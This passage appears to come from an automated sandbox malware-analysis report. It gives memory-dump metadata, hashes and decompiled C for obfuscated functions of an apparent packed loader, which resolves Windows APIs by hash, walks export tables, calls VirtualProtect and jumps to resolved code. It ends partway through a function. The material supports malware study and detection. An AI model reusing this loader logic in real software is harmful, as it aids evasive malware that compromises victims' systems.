0x024596c8
0x024596cc
0x024596d0
0x024596d5
0x024596d5
0x024596ea
0x024596ed
0x024596f4
0x02459700
0x02459709
0x0245970e
0x0245971f
0x0245971f
0x02459722
0x02459729
0x0245973a
0x02459746
0x0245975c
0x0245975c
0x02459766
0x02459784
0x0245979d
0x024597a4
0x024597b0
0x02459879
0x024597be
0x024597c8
0x024597ce
0x024597d7
0x024597dc
0x024597dc
0x024597e5
0x024597f4
0x02459835
0x02459807
0x0245981a
0x0245981a
0x02459838
0x02459847
0x0245984a
0x0245986a
0x0245984c
0x02459858
0x02459858
0x02459872
0x02459872
0x02459786
0x02459795
0x02459795
0x0245988f
0x02459892
0x0245989b
0x00000000
0x02459689
0x0245969a
0x00000000
0x00000000
0x024598ab
0x024598ae
0x00000000
0x00000000
0x00000000
0x024598ae
0x02459667
0x0245965b
0x02459646
0x024598b8
0x024598c0

APIs

LoadLibraryA.KERNELBASE(DC804CBF), ref: 0245971C
GetProcAddress.KERNELBASE(DC804CBF,C6F8E432), ref: 02459835

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 8a259e0db7e9a28644c2b88263d324da4db44ba3ef4d5c7c58744a7e52c520d1
Instruction ID: 52946bfd72f053e99c83926f4f4e6c203f65f472efed7712f153f6baba309d1c
Opcode Fuzzy Hash: 8a259e0db7e9a28644c2b88263d324da4db44ba3ef4d5c7c58744a7e52c520d1
Instruction Fuzzy Hash: 6EA1C875B10119DFCB04CF98C9D0AEEB7B2FF88304B59446AE956EB351D730AA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02442699, Relevance: 2.0, APIs: 1, Instructions: 472
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 33%

			E02442699(intOrPtr* __eax, void* __edx, signed int __edi) {
				char _v0;
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				signed int _v60;
				char _v64;
				signed int* _t140;
				signed int _t152;
				signed int _t168;
				intOrPtr _t169;
				intOrPtr _t172;
				intOrPtr _t184;
				signed int _t185;
				signed int* _t194;
				signed int* _t195;
				signed int _t197;
				intOrPtr* _t205;
				intOrPtr* _t214;
				signed int _t217;
				intOrPtr _t218;
				void* _t227;
				intOrPtr* _t228;
				intOrPtr _t249;
				signed int _t250;
				signed int _t252;
				signed int _t265;
				signed int _t268;
				signed int _t270;
				intOrPtr _t278;
				intOrPtr _t292;
				signed int _t293;
				void* _t297;
				signed int _t299;
				signed int* _t313;
				signed int** _t322;
				char* _t323;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t328;
				intOrPtr _t329;
				intOrPtr _t334;
				signed int _t337;
				intOrPtr _t342;
				signed int _t348;
				signed int _t354;
				intOrPtr _t361;
				void* _t362;

				_t362 = __edx;
				asm("in al, dx");
				asm("in eax, 0x72");
				 *__eax =  *__eax + __eax;
				_t140 =  *0x24492e0; // 0x19fde0
				 *0x2449851 = 0x5958;
				_v28 = 0xc6f8e435;
				_v60 = 0;
				 *0x24497f9 = __edi;
				_v20 = 0xc6f8e434;
				_push(__edi);
				_v16 = 0xc6f8e679;
				_v12 = _t140;
				 *0x2449749 = __edi;
				while(1) {
					asm("sbb dword [0x2449795], 0x7c00");
					if((_v16 ^ 0x2a823c2b) + 0x138527e2 == 0) {
						break;
					}
					_v32 = _v16 * _v20;
					 *0x244985d =  *0x244985d - 0x244983d;
					asm("adc dword [0x2449849], 0x2449801");
					_v44 = _v16 + _v28;
					do {
						 *0x244985d =  *0x244985d | 0x02449755;
						RtlAllocateHeap(0); // executed
						 *0x2449749 =  *0x2449749 | 0x02449801;
					} while (IsCharAlphaNumericW(0x31) == 0);
					_t152 = _v16;
					 *0x2449845 = 0x3b0e;
					_v60 =  &_v40;
					_v24 = 0xc6f8e434;
					 *0x2449815 = 0x1c6f;
					_v44 = _t152;
					 *0x2449801 = 0x5773;
					_v32 = 0xc6f8e435;
					 *0x2449755 = 0x75b3;
					 *0x24491a0 = 0x2449028;
					 *0x2449805 = 0x279e;
					if(_t152 != 0xc6f8e5bc) {
						 *0x244977d = 0xf85;
						 *0x244980d = 0x67ac;
						if(_t152 != 0xc6f8e514) {
							L9:
							 *0x2449801 = 0x55d9;
							if(_v44 == 0xc6f8e41b) {
								 *0x2449781 =  *0x2449781 - _t362;
								_v40 = (_v24 ^ 0x2a823c2b) + 0x138527e2;
							}
						} else {
							asm("sbb ecx, eax");
							 *0x244973d = 0x2c3f;
							_t361 =  *0x244942c; // 0x400000
							 *0x244980d =  *0x244980d + 0x2449789;
							 *0x2449841 = 0x2804;
							if((_v32 ^ 0x2a823c2b) + 0x138527e2 == _t361) {
								 *0x2449739 = 0x2449749 +  *0x2449739;
								E02442F44(_t362, 0xc60001b8, _v32);
								goto L9;
							}
						}
					} else {
						E024413C7( &_v40, _t362);
						 *0x2449815 = 0x4b90;
					}
					asm("adc ecx, [0x2449839]");
					 *0x244973d =  *0x244973d & 0x000000ff;
					_t313 =  *0x2449871; // 0x2449845
					 *0x24497c1 =  *0x24497c1 |  *_t313;
					_v44 = _v40;
					asm("sbb [0x2449739], edx");
					 *0x2449785 = 0x5cc5;
					asm("sbb dword [0x2449859], 0x5f55");
					 *0x2449859 = 0x73ee;
					if(_v44 == (_v20 ^ 0x2a823c2b) + 0x138527e2) {
						asm("sbb [0x2449739], eax");
						_t354 =  *0x2449855; // 0xd3d8a4ca
						 *0x2449785 =  *0x2449785 ^ _t354;
						 *0x244985d = 0x2d00;
						 *0x2449739 =  *0x2449739 | 0x138527e2;
						_v24 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
						_t168 =  *0x24492d0; // 0x19fdcc
						 *0x24492d0 =  *0x24492d0 ^ _t168;
						 *0x2449745 =  *0x2449745 + 0x4c42;
						_t169 =  *0x24492d4; // 0x2440000
						 *0x2449254 = _t169;
						asm("sbb [0x2449781], ecx");
						 *0x2449024 =  *0x24492d8;
						_t172 =  *0x24492dc; // 0xe193d4a8
						 *0x2449855 =  ~( *0x2449855);
						 *0x2449274 = _t172;
					}
					asm("adc dword [0x24497cd], 0x62f2");
					asm("sbb dword [0x24497d5], 0x24497c1");
					 *0x2449785 =  *0x2449785 | 0x02449849;
					 *0x2449809 =  *0x2449809 - 0x244983d;
					 *0x244973d =  *0x244973d ^ 0x000036b8;
					_v16 = (_v16 ^ 0x2a823c2b) - (_v20 ^ 0x2a823c2b) - 0x138527e2 ^ 0x2a823c2b;
				}
				 *0x244973d =  *0x244973d ^ 0x0244984d;
				_v56 = _v12;
				asm("sbb eax, eax");
				_t184 =  *0x24491a0; // 0x2449028
				_v16 = 0xc6f8e435;
				_v60 = 0xc6f8e465;
				_t365 = 0xc6f8e434;
				_v44 = 0xc6f8e434;
				 *0x2449805 =  *0x2449805 | 0x00001f5f;
				 *0x2449795 =  *0x2449795 | 0x02449785;
				 *0x24497d1 = 0x3c4b;
				if((_v44 ^ 0x2a823c2b) + 0x138527e2 ==  *0x2449024) {
					L36:
					_t185 = _v16;
				} else {
					_t43 = _t184 + 0x1c8; // 0x2449264
					 *0x2449841 =  *0x2449841 + 0x3492;
					_v60 = 0xc6f8e408;
					 *0x2449859 =  *0x2449859 - 0x55f2;
					_v5 = 0x85;
					 *0x24497d5 =  *0x24497d5 - 0x6364;
					 *0x2449745 =  *0x2449745 | 0x024497c5;
					asm("adc dword [0x244985d], 0x2449789");
					 *0x2449789 = 0x2098;
					asm("adc dword [0x2449779], 0x65bc");
					 *0x2449781 = 0x1a64;
					if((_v16 ^ 0x2a823c2b) + 0x138527e2 == ( *( *_t43) ^ 0x2a823c2b) + 0x138527e2) {
						goto L36;
					} else {
						asm("adc dword [0x2449791], 0x6fee");
						asm("adc dword [0x2449801], 0x2449845");
						_v24 = _v16;
						 *0x2449855 =  *0x2449855 ^ 0x024497f9;
						 *0x244984d =  *0x244984d - 0x24497f9;
						 *0x244973d =  *0x244973d & 0x02449749;
						_t227 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
						while(1) {
							_t334 =  *0x24491a0; // 0x2449028
							_t52 = _t334 + 0x194; // 0x2449204
							_t292 =  *((intOrPtr*)( *_t52));
							_t293 =  *(_t292 + 0x3c);
							 *0x24497d1 = 0x5783;
							if(_t227 >=  *((intOrPtr*)(_t293 + _t292 + 0x28))) {
								break;
							}
							_t337 =  *0x2449849; // 0x7c7a
							 *0x244980d =  *0x244980d + _t337;
							_v24 = (_v24 ^ 0x2a823c2b) + 0x00000001 ^ 0x2a823c2b;
							_t227 = _t227 + 1;
						}
						_t228 =  *0x244975d; // 0x244977d
						 *0x244984d =  *0x244984d +  *_t228;
						_v60 = _t365;
						asm("adc ecx, [0x2449859]");
						_t342 =  *0x24491a0; // 0x2449028
						 *0x2449851 =  *0x2449851 + 0x2449741;
						_t58 = _t342 + 0x194; // 0x2449204
						 *0x2449789 =  *0x2449789 + 0x1acf;
						 *0x244977d =  *0x244977d & 0x0244978d;
						 *0x24492cc = (_v24 ^ 0x2a823c2b) +  *((intOrPtr*)( *_t58)) + 0x138527e2;
						_v12 = 0x1e725789;
						_v24 = 0xc6f8e455;
						 *0x244983d = 0x1113;
						 *0x244984d =  *0x244984d | 0x02449849;
						 *0x2449861 =  *0x2449861 + 0x2449739;
						_t348 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
						 *0x2449841 = 0x5ec5;
						_v44 = _t348;
						 *0x2449859 = 0x64a7;
						if(_t348 < (_v24 ^ 0x2a823c2b) + 0x138527e2) {
							_t66 = _t348 - 0x138527e2; // 0xb373be97
							_t297 = (_t293 & 0x0000099c) + 0x414f;
							_v20 = _t66;
							do {
								 *0x2449841 =  *0x2449841 - 0x2449861;
								 *0x24497cd =  *0x24497cd + 0x138527e2;
								_t299 =  *0x2449809; // 0x2009085
								 *0x244974d =  *0x244974d | _t299;
								 *0x2449815 =  *0x2449815 & 0x02449801;
								_v12 = ((_v20 ^ 0x2a823c2b) * 0xdf41139d ^ 0xc6f8e08e) + _v12;
								 *0x244983d =  *0x244983d + _t299;
								_t249 =  *0x24492cc; // 0x4f41139d
								_v52 = _t249;
								asm("adc ebx, ebx");
								_t250 = _v12;
								_t365 = _t250 % 0xc6f8e408;
								asm("sbb eax, [0x2449801]");
								_t252 = _v20;
								asm("adc dword [0x24497bd], 0x4ebe");
								if(_t250 % 0xc6f8e408 == 0) {
									asm("adc [0x2449755], edx");
									_t365 = _v12;
									 *0x2449839 = ( *0x2449839 & 0x000000ff) -  *0x2449809;
									 *0x2449781 =  *0x2449781 + ( *0x24497c9 & 0x0000ffff);
									 *0x2449849 =  *0x2449849 ^ _t365;
									 *0x2449811 = 0x3142;
									_v12 = (_t252 ^ 0xffc33fbf | 0xdf41139d) + 0x39071f72 & _t365;
								} else {
									 *0x2449749 =  *0x2449749 - 0x4d1b;
									 *0x24497bd =  *0x24497bd | 0x02449795;
									_v12 = _v12 - ((_t252 ^ 0xea823c2b) + 0x0636139d | 0xc6f8d08e);
								}
								asm("adc eax, ebx");
								 *0x2449785 =  *0x2449785 - 0xdc8;
								_t297 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
								 *0x24497d5 = 0x4d84;
								 *0x2449801 = 0x2574;
								if(_t297 < (_v24 ^ 0x2a823c2b) + 0x138527e2) {
									_t84 = _t297 - 0x138527e2; // 0xb373be97
									 *0x2449815 =  *0x2449815 ^ 0x00001809;
									_v32 = _t84;
									do {
										 *0x2449861 =  *0x2449861 - 0x138527e2;
										asm("adc [0x2449745], ecx");
										_t265 = _v32 ^ 0x2a823c2b;
										_v48 = _t265;
										asm("sbb dword [0x24497b9], 0x73b9");
										_v12 = _v12 - (_t265 * 0xc601139d ^ 0xc6f8d08e);
										_t268 = _v12;
										_t365 = _t268 % 0xc6f8e408;
										_t270 = _v20;
										if(_t268 % 0xc6f8e408 == 0) {
											_v12 = (_t270 ^ 0xffc33fbf | 0xdf41139d) + 0x39071f72 & _v12;
										} else {
											_v12 = _v12 - ((_t270 ^ 0xea823c2b) + 0x0636139d | 0xc6f8d08e);
										}
										if(_v48 == 0xc6f8e465) {
											_t278 =  *0x24491a0; // 0x2449028
											_t101 = _t278 + 0x194; // 0x2449204
											 *_v56 = _v52( *((intOrPtr*)( *_t101)),  *0x2449024,  *0x2449274);
										}
										_t297 = _t297 + 1;
										_v32 = _v32 + 1;
									} while (_t297 < (_v24 ^ 0x2a823c2b) + 0x138527e2);
									_t348 = _v44;
								}
								_t348 = _t348 + 1;
								_v20 = _v20 + 1;
								_v44 = _t348;
							} while (_t348 < (_v24 ^ 0x2a823c2b) + 0x138527e2);
						}
						 *0x2449218 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
						 *0x2449220 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
						_t185 = _v60;
					}
				}
				_v24 = (_t185 ^ 0x2a823c2b) + 0x138527e2;
				_v24 = _v24 - 0x138527e2 ^ 0x2a823c2b;
				_t321 = _v28;
				if(_v28 != _v24) {
					_t322 =  *0x24492e0; // 0x19fde0
					_t194 = (_v28 ^ 0x2a823c2b) + 0x138527e2;
					 *_t322 = _t194;
				} else {
					_t195 =  *0x244901c; // 0x2449438
					_v36 = _v36 & 0x00000000;
					_v36 = _v36 |  *_t195;
					_t197 =  *0x24492c4; // 0xc7e310bf
					_v60 = _t197;
					_v60 = 0xc6f8e475;
					_v44 = 0xc6f8e408;
					_v5 = 0x85;
					_t205 =  *0x24491c0; // 0x2449428
					E02442209(_t321, _t365, 0x138527e2,  *_t205, 0x2449116, 1, 4); // executed
					_t323 =  *0x24492c8; // 0x2442646
					 *_t323 = (_v5 ^ 0x0000003f) + 0x2f;
					_t326 =  *0x24492c8; // 0x2442646
					_t327 =  *0x24492b8; // 0x24590b3
					_t328 =  *0x24492c8; // 0x2442646
					 *((intOrPtr*)(_t328 + 1)) = 0xec7ad81e - (_v44 ^ 0x2a823c2b) - _t326 + _t327;
					_t214 =  *0x24492b8; // 0x24590b3
					 *_t214( *0x2449358,  *0x2449254,  *0x2449024,  *0x2449274, _v36,  *0x24491a0,  *0x24492c8, (_v44 ^ 0x2a823c2b) + 0x138527e2, (_v60 ^ 0x2a823c2b) + 0x138527e2,  &_v64);
					 *0x24492d0 =  &_v0;
					_t217 =  *0x24492d0; // 0x19fdcc
					_t329 =  *0x2449218; // 0x2040000
					 *_t217 =  *_t217 + _t329;
					_t218 =  *0x24491a0; // 0x2449028
					_t137 = _t218 + 0x1cc; // 0x2449440
					_t194 =  *0x24492e0; // 0x19fde0
					 *_t194 =  *_t194 |  *( *_t137);
				}
				return _t194;
			}

0x02442699
0x0244269d
0x024426a0
0x024426a2
0x024426a4
0x024426af
0x024426b9
0x024426bc
0x024426c4
0x024426ca
0x024426d3
0x024426da
0x024426e1
0x024426e9
0x024429a2
0x024429a5
0x024429b3
0x00000000
0x00000000
0x02442704
0x02442710
0x0244271d
0x02442727
0x0244272a
0x0244272a
0x02442736
0x0244273e
0x0244274e
0x0244275f
0x02442768
0x02442772
0x02442775
0x0244277c
0x02442786
0x02442789
0x02442793
0x02442796
0x024427a0
0x024427aa
0x024427b9
0x024427d3
0x024427e2
0x024427ec
0x0244283e
0x0244283e
0x0244284f
0x0244286e
0x02442874
0x02442874
0x024427f2
0x024427f2
0x024427f7
0x02442801
0x02442809
0x02442817
0x02442821
0x0244282f
0x02442839
0x00000000
0x02442839
0x02442821
0x024427bf
0x024427bf
0x024427c4
0x024427c4
0x0244287e
0x02442884
0x0244288d
0x02442895
0x0244289b
0x0244289e
0x024428a7
0x024428b4
0x024428c4
0x024428ce
0x024428db
0x024428e4
0x024428ea
0x024428f2
0x024428fe
0x02442904
0x02442918
0x0244291d
0x02442923
0x0244292d
0x02442932
0x02442937
0x02442943
0x0244294d
0x02442952
0x02442958
0x02442958
0x0244295d
0x0244296d
0x02442979
0x02442987
0x02442993
0x0244299f
0x0244299f
0x024429bc
0x024429c6
0x024429c9
0x024429cb
0x024429d6
0x024429d9
0x024429e6
0x024429eb
0x024429ee
0x02442a01
0x02442a0f
0x02442a1b
0x02442e28
0x02442e28
0x02442a21
0x02442a21
0x02442a27
0x02442a33
0x02442a3a
0x02442a44
0x02442a48
0x02442a55
0x02442a61
0x02442a6d
0x02442a79
0x02442a87
0x02442a91
0x00000000
0x02442a97
0x02442a97
0x02442aa4
0x02442aae
0x02442ab1
0x02442abe
0x02442aca
0x02442ad4
0x02442aff
0x02442b06
0x02442b0c
0x02442b12
0x02442b16
0x02442b19
0x02442b27
0x00000000
0x00000000
0x02442adb
0x02442ae1
0x02442afb
0x02442afe
0x02442afe
0x02442b2d
0x02442b34
0x02442b3a
0x02442b3d
0x02442b46
0x02442b4c
0x02442b56
0x02442b5c
0x02442b68
0x02442b7b
0x02442b80
0x02442b8d
0x02442b9c
0x02442ba9
0x02442bb5
0x02442bc1
0x02442bc5
0x02442bcf
0x02442bd2
0x02442bde
0x02442bea
0x02442bf0
0x02442bf6
0x02442bf9
0x02442bfe
0x02442c0a
0x02442c16
0x02442c1c
0x02442c2c
0x02442c36
0x02442c39
0x02442c3f
0x02442c45
0x02442c48
0x02442c4a
0x02442c52
0x02442c54
0x02442c5a
0x02442c5d
0x02442c69
0x02442ca0
0x02442ca6
0x02442cb6
0x02442cc8
0x02442cd3
0x02442cde
0x02442cea
0x02442c6f
0x02442c74
0x02442c83
0x02442c92
0x02442c92
0x02442ced
0x02442cf9
0x02442d03
0x02442d07
0x02442d13
0x02442d1d
0x02442d24
0x02442d2a
0x02442d34
0x02442d37
0x02442d37
0x02442d46
0x02442d4c
0x02442d4e
0x02442d57
0x02442d66
0x02442d69
0x02442d73
0x02442d75
0x02442d7a
0x02442dab
0x02442d80
0x02442d8f
0x02442d8f
0x02442db5
0x02442dc7
0x02442dcc
0x02442dda
0x02442dda
0x02442de1
0x02442de2
0x02442de7
0x02442def
0x02442def
0x02442df7
0x02442df8
0x02442dfd
0x02442e00
0x02442bf9
0x02442e0f
0x02442e1b
0x02442e20
0x02442e20
0x02442a91
0x02442e2f
0x02442e39
0x02442e3f
0x02442e44
0x02442f31
0x02442f39
0x02442f3b
0x02442e4a
0x02442e4a
0x02442e51
0x02442e55
0x02442e58
0x02442e5d
0x02442e60
0x02442e67
0x02442e72
0x02442e8c
0x02442e9c
0x02442ea4
0x02442eae
0x02442ebc
0x02442ec4
0x02442ecf
0x02442ed5
0x02442ef3
0x02442efe
0x02442f03
0x02442f08
0x02442f0d
0x02442f13
0x02442f15
0x02442f1a
0x02442f22
0x02442f27
0x02442f27
0x02442f41

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02442736

Memory Dump Source

Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 393aadb7488ace6f0398989fbb3619e453daefe09e21f529253c166874687441
Instruction ID: ed779c985a60a2357f1496db589dbaefa7fa4b1b4fe3805f53bb24b2249f3c84
Opcode Fuzzy Hash: 393aadb7488ace6f0398989fbb3619e453daefe09e21f529253c166874687441
Instruction Fuzzy Hash: 5A326A79E90604DFEB48CFA8E88599BBBF2FB48314B044C6AD405EB340D7749965EF10

Uniqueness

Uniqueness Score: -1.00%

Function 02442209, Relevance: 1.8, APIs: 1, Instructions: 256
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E02442209(signed int __ecx, signed int __edx, signed int __edi, intOrPtr _a4, intOrPtr _a8, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				void* __ebx;
				signed int* _t81;
				intOrPtr _t83;
				signed int* _t84;
				intOrPtr _t96;
				int _t108;
				intOrPtr* _t117;
				signed int _t132;
				intOrPtr _t140;
				intOrPtr _t142;
				intOrPtr _t144;
				signed int _t145;
				intOrPtr _t146;
				signed int _t148;
				void* _t160;
				signed int _t168;
				void* _t176;
				intOrPtr _t189;
				signed int _t194;
				signed int _t196;
				void* _t203;
				intOrPtr _t214;

				_t196 = __edx;
				_t166 = __ecx;
				 *0x2449861 =  *0x2449861 ^ __edi;
				_v8 = 0xc6f8e435;
				asm("adc eax, [0x244983d]");
				_t81 =  *0x2449821; // 0x2449741
				 *0x24497d5 =  *0x24497d5 ^  *_t81;
				_v36 = 0xc6f8e434;
				_t83 =  *0x2449795; // 0xff4dd7d5
				 *0x24497cd =  *0x24497cd + _t83;
				_t148 = 0;
				_t84 =  *0x24497ad; // 0x24497cd
				 *0x24497d1 =  *0x24497d1 ^  *_t84;
				 *0x2449358 = E02442209;
				_v12 = 0;
				 *0x2449801 =  *0x2449801 | __ecx;
				 *0x24497b9 =  *0x24497b9 | 0x00005f04;
				_push(__edi);
				 *0x2449745 =  *0x2449745 & __edx;
				 *0x24497d5 =  *0x24497d5 | 0x00005a39;
				 *0x24497f9 = 0x6c93;
				_v16 = (_v36 ^ 0x2a823c2b) + 0x138527e2;
				_v44 = 0;
				while(1) {
					 *0x2449755 = 0x1f9a;
					 *0x2449845 = 0x6731;
					if(_t148 >= _v16) {
						goto L8;
					}
					 *0x2449839 =  *0x2449839 + 0x2449749;
					 *0x2449789 = 0x6771;
					if(_t148 != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
						_t168 = _a4 +  *((intOrPtr*)(_v40 + _t148 * 4));
						 *0x2449805 = 0x1b5c;
						_v32 = _t168;
						if(_t168 != 0) {
							L10:
							 *0x2449841 = 0x4e9;
							asm("adc dword [0x2449739], 0x3853");
							asm("sbb dword [0x244977d], 0x244984d");
							 *0x24497c1 =  *0x24497c1 + 0x5651;
							E02441000(_t148, 0x138527e2, _a8, _v32,  &_v12);
						}
						goto L11;
					} else {
						 *0x24497c9 =  *0x24497c9 & 0x00001be9;
						_t132 = E02441D6E(_t166, _t196, _a4);
						 *0x2449849 =  *0x2449849 - 0x63d3;
						_v16 = _t132;
						 *0x24497fd =  *0x24497fd + _t196;
						_t188 = _v16;
						 *0x2449849 =  *0x2449849 - 1;
						 *0x244974d = 0x3da3;
						if(_v16 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
							L14:
							 *0x24497bd =  *0x24497bd - 0x244983d;
							 *0x2449839 =  *0x2449839 | 0x00003b7e;
							_t96 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
						} else {
							 *0x244978d =  *0x244978d - 1;
							 *0x2449815 =  *0x2449815 | 0x00003237;
							 *0x2449444 = E02441C79(_t148, _t188, _a4, _v16);
							 *0x2449789 =  *0x2449789 - _t148;
							_t189 =  *0x2449444; // 0x74b81020
							 *0x24497f9 =  *0x24497f9 & 0x02449855;
							 *0x244978d = 0x3836;
							if(_t189 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
								goto L14;
							} else {
								_t140 =  *0x2449444; // 0x74b81020
								_v16 =  *((intOrPtr*)(_t140 + 0x18));
								 *0x2449795 =  *0x2449795 - 1;
								_t142 =  *0x2449444; // 0x74b81020
								 *0x2449809 = 0x1722;
								asm("sbb dword [0x2449809], 0x2449841");
								_v40 = _a4 +  *((intOrPtr*)(_t142 + 0x20));
								_t144 =  *0x2449444; // 0x74b81020
								 *0x24497cd =  *0x24497cd - 0x2449745;
								_t194 = _a4 +  *((intOrPtr*)(_t144 + 0x24));
								_t145 =  *0x2449839; // 0xcab5f2bc
								asm("adc eax, [0x24497cd]");
								 *0x2449839 = _t145;
								_v48 = _t194;
								_t146 =  *0x2449444; // 0x74b81020
								 *0x24497d5 =  *0x24497d5 ^ _t194;
								_t168 = _a4 +  *((intOrPtr*)(_t146 + 0x1c));
								_v52 = _t168;
								 *0x2449781 = 0x5bca;
								L11:
								 *0x2449855 =  *0x2449855 + _t168;
								_t166 = _v12;
								 *0x244984d =  *0x244984d & 0x00005e63;
								 *0x2449805 = 0x5cc;
								 *0x24497c9 = 0xc84;
								if(_v12 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
									 *0x2449755 = 0x6f48;
									_t148 = _t148 + 1;
									continue;
								} else {
									 *0x2449739 = 0x71a4;
									 *0x24497bd = 0x12eb;
									_t166 = _v52;
									_v56 =  *((intOrPtr*)(_v52 + ( *(_v48 + _t148 * 2) & 0x0000ffff) * 4));
									goto L8;
								}
							}
						}
					}
					L20:
					return _t96;
					L8:
					_t168 = _v12;
					asm("adc dword [0x2449809], 0x2449741");
					if(_t168 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
						goto L14;
					} else {
						asm("sbb dword [0x2449811], 0x2449839");
						 *0x2449851 = 0x16e6;
						if(_v44 == 0) {
							_v24 = _v56 + _a4;
							asm("sbb [0x2449739], eax");
							 *0x2449809 =  *0x2449809 & 0x024497c5;
							 *0x244978d = 0x2b74;
							if(_a16 != 0) {
								_v28 = 0;
								asm("sbb [0x2449861], ecx");
								_t203 = 3;
								asm("sbb dword [0x24497c9], 0x5c63");
								_push(_t203 + 8);
								 *0x24497fd =  *0x24497fd | _t168;
								_pop(_t176);
								_t160 = 6;
								_t214 = _t214 - _a16 * (_t176 - 1 - _t160 - 1 - 1);
								_v28 = _t214;
								_v16 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
								if(_v16 != _a16) {
									_t117 =  &_a16;
									do {
										_t117 = _t117 + 4;
										 *((intOrPtr*)(_v28 + _v16 * 4)) =  *_t117;
										_v16 = (_v36 ^ 0x2a823c2b) + _v16 + 0x138527e2;
									} while (_v16 != _a16);
								}
							}
							_v20 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
							_t108 = VirtualProtect(0 + _v24 - 1, ??, ??, ??); // executed
							_push(_t108);
							_v20 = _v20 + 1 +  *((intOrPtr*)(_t214 - 1 + 0x234)) - 1;
							_t96 = _v20;
						} else {
							goto L10;
						}
					}
					goto L20;
				}
			}

0x02442209
0x02442209
0x0244220f
0x02442215
0x0244221c
0x02442223
0x0244222a
0x02442230
0x02442237
0x0244223c
0x02442242
0x02442244
0x0244224b
0x02442251
0x0244225b
0x0244225e
0x02442267
0x02442277
0x0244227a
0x02442285
0x02442291
0x0244229b
0x024422a0
0x024422a3
0x024422a6
0x024422b2
0x024422bc
0x00000000
0x00000000
0x024422c9
0x024422d5
0x024422e1
0x0244240d
0x02442410
0x0244241a
0x02442420
0x0244246a
0x0244246a
0x02442477
0x02442482
0x0244248f
0x0244249c
0x0244249c
0x00000000
0x024422e7
0x024422e7
0x024422f4
0x024422f9
0x02442303
0x02442306
0x0244230f
0x02442312
0x0244231e
0x02442328
0x02442510
0x02442513
0x0244251f
0x02442529
0x0244232e
0x0244232e
0x02442337
0x02442349
0x02442351
0x02442357
0x0244235f
0x0244236d
0x02442377
0x00000000
0x0244237d
0x0244237d
0x0244238b
0x0244238e
0x02442394
0x02442399
0x024423a6
0x024423b9
0x024423bc
0x024423c4
0x024423ce
0x024423d1
0x024423d6
0x024423dc
0x024423e1
0x024423e4
0x024423e9
0x024423f2
0x024423f5
0x024423f8
0x024424a1
0x024424a4
0x024424aa
0x024424ad
0x024424bb
0x024424c7
0x024424d1
0x02442500
0x0244250a
0x00000000
0x024424d7
0x024424d7
0x024424e4
0x024424f2
0x024424f8
0x00000000
0x024424f8
0x024424d1
0x02442377
0x02442328
0x02442641
0x02442645
0x0244242b
0x02442430
0x02442433
0x02442443
0x00000000
0x02442449
0x0244244e
0x0244245a
0x02442464
0x02442537
0x02442541
0x0244254a
0x02442556
0x02442560
0x02442568
0x0244256f
0x0244257f
0x02442580
0x0244258f
0x02442590
0x02442596
0x0244259a
0x024425a9
0x024425ab
0x024425b5
0x024425c0
0x024425c6
0x024425c9
0x024425cf
0x024425d4
0x024425e6
0x024425ef
0x024425c9
0x024425c0
0x024425fe
0x0244261a
0x0244261f
0x0244263a
0x0244263e
0x00000000
0x00000000
0x00000000
0x02442464
0x00000000
0x02442443

Memory Dump Source

Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8316e2cb387ffdd2b9cae6e9e3cdd4dfacc7583b4ab1e0135a180191150401
Instruction ID: d46639d4b98ff0c152aed5dfba2691b0339a1d65d871ddc8664d7bb7f45bab40
Opcode Fuzzy Hash: bd8316e2cb387ffdd2b9cae6e9e3cdd4dfacc7583b4ab1e0135a180191150401
Instruction Fuzzy Hash: DFC13A78E94604DFEB08CF58E895EAB77F2FB48308B44885AE805D7341E7759924EF44

Uniqueness

Uniqueness Score: -1.00%

Function 0244266E, Relevance: .3, Instructions: 317
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E0244266E(void* __eax, void* __edx, signed int __edi) {
				intOrPtr* _t140;
				signed int _t141;
				signed int _t153;
				signed int _t169;
				intOrPtr _t170;
				intOrPtr _t173;
				intOrPtr _t185;
				signed int _t186;
				signed int* _t195;
				signed int* _t196;
				signed int _t198;
				intOrPtr* _t206;
				intOrPtr* _t215;
				signed int _t218;
				intOrPtr _t219;
				void* _t228;
				intOrPtr* _t229;
				intOrPtr _t250;
				signed int _t251;
				signed int _t253;
				signed int _t266;
				signed int _t269;
				signed int _t271;
